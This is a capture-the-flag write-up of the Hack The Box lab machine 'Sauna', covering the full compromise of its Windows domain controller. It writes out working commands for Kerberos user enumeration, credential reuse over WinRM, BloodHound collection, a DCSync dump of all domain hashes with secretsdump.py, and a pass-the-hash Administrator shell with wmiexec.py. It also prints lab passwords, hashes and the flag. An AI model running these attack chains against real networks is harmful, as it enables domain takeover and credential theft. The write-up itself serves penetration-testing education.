Hack The Box Write-Up Sauna - 10.10.10.175
Post
Cancel

# Hack The Box Write-Up Sauna - 10.10.10.175

Technology is just a tool. In terms of getting the kids working together and motivating them, the teacher is the most important.

Bill Gates

# Recon

## Port scan with Nmap

As always, I start the initially enumeration with a port scan with Nmap.

1 nmap -sC -sV -oA ./nmap/sauna.txt 10.10.10.175 

The results of the port scan.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 21:38 CET Nmap scan report for 10.10.10.175 Host is up (0.061s latency). Not shown: 988 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | 34A87605B2aCFdD891c1 | version | bind | NULL: |_ 34A87605B2aCFdD891c1 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Egotistical Bank :: Home 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-16 04:38:52Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open tcpwrapped 445/tcp open microsoft-ds? 464/tcp open tcpwrapped 593/tcp open tcpwrapped 636/tcp open tcpwrapped 3268/tcp open tcpwrapped 3269/tcp open tcpwrapped 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=2/15%Time=5E4856E2%P=x86_64-pc-linux-gnu%r(NULL SF:,2C,"\0\*\+\t\x81\x82\0\x01\0\0\0\0\0\0\x1434A87605B2aCFdD891c1\x03com\ SF:0\0\x01\0\x01")%r(DNSVersionBindReqTCP,4C,"\0\*\+\t\x81\x82\0\x01\0\0\0 SF:\0\0\0\x1434A87605B2aCFdD891c1\x03com\0\0\x01\0\x01\0\x1e\0\x06\x81\x04 SF:\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03"); Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 7h59m52s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-02-16T04:40:32 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 283.79 seconds 

The open port that attracts my attention is port 80/tcp (HTTP). This port will be my starting point of my reconnaissance.

# Enumeration

## Enumeration Web Server

In my web browser, I go to the website http://10.10.10.175/ and landed on the website of the Egotisctical Bank.

I have searched some around on the website. On the webpage http://10.10.10.175/about.html#team there are some team members listed. Pretty interesting, now I know the members of this company.

I note down the users in a text-file.

• Fergus Smith
• Hugo Bear
• Steven Kerb
• Shaun Coins
• Bowie Taylor
• Sophie Driver

Let’s try to find out if those users exist on the server. And I need to know the username convention and maybe we can try to brute-force or guess their passwords.

## User enumeration with LDAP

First, I have tried to enumerate the users with enum4linux but this script is finding nothing useful. As the LDAP port 389/tcp is open on this box, I invoked this command for user enumeration.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ~$nmap -p 389 --script ldap-search 10.10.10.175 ... dn: CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=TPM Devices,DC=EGOTISTICAL-BANK,DC=LOCAL | dn: CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL |_ dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL Nmap done: 1 IP address (1 host up) scanned in 2.78 seconds  I have now the domain name EGOTISTICAL-BANK.local and one user account found Hugo Smith. On the team members page, there is no member listed with this name, it seems to be a combination from the team member Fergus Smith and Hugo Bear. I also run Nmap with the krb-enum-users script. 1 2 3 4 5 6 7 8 9 10 ~$ nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='EGOTISTICAL-BANK.local' 10.10.10.175 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 22:19 CET Nmap scan report for 10.10.10.175 Host is up (0.029s latency). PORT STATE SERVICE 88/tcp open kerberos-sec | krb5-enum-users: | Discovered Kerberos principals |_ [email protected] Nmap done: 1 IP address (1 host up) scanned in 0.78 seconds 

The user account [email protected] is default present on a Windows machine, this is not very relevant information for the moment. I have found some users, let’s try to narrow down the usernames and poke for their passwords.

## Ticket-Gaining-Ticket grab fsmith

I do not know the username convention in the Active Directory. So, I need to try guessing the usernames with GetNPUsers.py. After some trying, I figured out that the username convention is the first letter of the name with the full surname (ex. fsmith). I invoked the command below to gain the TGT for the user Fergus Smith. This is possible since Kerberos Pre-Authentication is enabled for this account.

# Privilege Escalation {#8-privilege-escalation}

## Enumeration for root

I have owned the user on this box and starting the enumeration for getting root. As always, I need to know what kind of user I’m, which privileges do I have with this account?

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 *Evil-WinRM* PS C:\Users\FSmith\Documents> whoami /all USER INFORMATION ---------------- User Name SID ====================== ============================================== egotisticalbank\fsmith S-1-5-21-2966785786-3096785034-1186376766-1105 GROUP INFORMATION ----------------- Group Name Type SID Attributes =========================================== ================ ============ ================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448 PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled USER CLAIMS INFORMATION ----------------------- User claims unknown. Kerberos support for Dynamic Access Control on this device has been disabled. 

The output is interesting. I see that this user account has SeChangeNotifyPrivilege privileges. With this privilege, this user is able to bypass some Windows security checks. Bypass Traverse Checking determines which users can traverse directory or file system folder trees even though they might not have permissions on the level of the traversed directory or file system folder hierarchy itself. I need to keep this in my mind, do know now if I need to use this ‘exploit’.

## Enumeration with WindowsEnum.ps1

I need to do more enumeration. For this step, I use the script WindowsEnum.ps1. This script can be downloaded from GitHub. Before I uploaded this script to this box I created the hidden folder .enum in C:\. I always create this folder, so that other hackers do not steal my information. Everybody needs to learn, right? I invoked the commands below to prepare the environment.

1 2 3 4 5 6 7 8 9 10 11 12 *Evil-WinRM* PS C:\Users\FSmith\Documents> cd ../../../ *Evil-WinRM* PS C:\> mkdir .enum Directory: C:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 2/17/2020 10:55 AM .enum *Evil-WinRM* PS C:\> cd .enum *Evil-WinRM* PS C:\.enum> upload WindowsEnum.ps1 Info: Uploading WindowsEnum.ps1 to C:\.enum\WindowsEnum.ps1 Data: 9492 bytes of 9492 bytes copied Info: Upload successful! 

Now I can run the script.

1 2 3 4 5 6 7 8 9 10 *Evil-WinRM* PS C:\.enum> upload WindowsEnum.ps1 ... ------------------------------------------ User Autologon Registry Items ------------------------------------------ DefaultDomainName DefaultUserName DefaultPassword ----------------- --------------- --------------- EGOTISTICALBANK EGOTISTICALBANK\svc_loanmanager Moneymakestheworldgoround! ... 

After running this script for a while. This username and password of the user svc_loanmanager are visible for the Register. The AutoLogon property in the register was set for the user account svc_loanmanager.

svc_loanmanager:Moneymakestheworldgoround!

# Lateral Movement

## From f.smith to user svc_loanmanager

As this user is a member of the group Remote Management Users, the next step is an obvious step; create a Remote Powershell session to the box with this user. I invoked this command:

1 evil-winrm -u svc_loanmgr -p Moneymakestheworldgoround! -i 10.10.10.175 

I’m landed on a shell with this user account. I have again run the WindowsEnum.ps1 script, but this time it returns nothing useful. I have searched some around but nothing useful to find. I have

## Enumeration with Bloodhound

I’ve got this whole box flashbacks to an earlier box named Forest. There I have taken the dog out of his kennel, think that it is now also time to let this dog out. I uploaded the ingestor SharpHound.ps1 to my working directory on this box and run this script.

1 2 3 4 5 6 7 8 9 10 11 *Evil-WinRM* PS C:\.enum> upload SharpHound.ps1 Info: Uploading SharpHound.ps1 to C:\.enum\SharpHound.ps1 Data: 1296724 bytes of 1296724 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\.enum> . .\Sharphound.ps1 *Evil-WinRM* PS C:\.enum> Invoke-Bloodhound -collectionmethod All -Domain "EGOTISTICALBANK.local" -ldapuser svc_loanmgr -ldappass Moneymakestheworldgoround! *Evil-WinRM* PS C:\.enum> download 20200217203951_BloodHound.zip Info: Downloading C:\.enum\20200217203951_BloodHound.zip to 20200217203951_BloodHound.zip Info: Download successful! 

Booted up Bloodhound and uploaded my zip-file to Bloodhound.

The user svc_loanmgr has GetChangesAll and GetChanges privileges, with these permissions I’m able to perform an ADSync attack on this box. I can run DCSync locally with Invoke-Mimikatz, but this time I will run this remotely with secretsdump.py from Impacket.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 ~$sudo python3 secretsdump.py 'svc_loanmgr:[email protected]' [sudo] password for kali: Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c::: EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd::: EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd::: EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c::: SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:7a2965077fddedf348d938e4fa20ea1b::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031 Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0 Administrator:des-cbc-md5:19d5f15d689b1ce5 krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24 krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9 krbtgt:des-cbc-md5:c170d5dc3edfc1d9 EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324 EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9 EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7 EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2 EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2 SAUNA$:aes256-cts-hmac-sha1-96:a90968c91de5f77ac3b7d938bd760002373f71e14e1a027b2d93d1934d64754a SAUNA$:aes128-cts-hmac-sha1-96:0bf0c486c1262ab6cf46b16dc3b1b198 SAUNA$:des-cbc-md5:b989ecc101ae4ca1 [*] Cleaning up...  ## Own Sauna {#13-own-sauna} The last thing I need to do is create a shell to this box with the user account Administrator. With the use of wmiexec.py, there is no need for cracking the password of this account. 1 2 3 4 5 6 7 8 9 10 11 ~$ python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff [email protected] Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation [*] SMBv3.0 dialect used [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands C:\>whoami egotisticalbank\administrator C:\>cd Users\Administrator\Desktop C:\Users\Administrator\Desktop>type root.txt f3ee04965c68257382e31502cc5e881f C:\Users\Administrator\Desktop> 

Thanks for reading this write-up! Did you enjoy reading this write-up? Or learned something from it? Please consider spending a respect point: https://app.hackthebox.com/profile/224856.com/profile/224856. Thanks!

Happy Hacking :-)